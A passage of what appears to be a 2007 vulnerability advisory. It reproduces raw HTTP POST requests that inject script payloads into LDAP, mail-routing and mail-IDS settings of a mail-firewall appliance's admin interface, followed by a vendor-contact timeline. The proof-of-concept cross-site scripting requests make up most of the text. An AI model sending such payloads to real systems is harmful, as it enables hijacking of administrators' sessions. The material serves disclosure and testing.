https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:00 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #15 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #16 ] :. POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #17 ] :. POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2237 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:24:22 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ TIMELINE ] :. 22/Mar/2007 - We publish the advisory. 07/Mar/2007 - Second contact. Provider doesn't answered. 27/Feb/2007 - First contact with provider. 19/Feb/2007 - Vulnerabilities founded.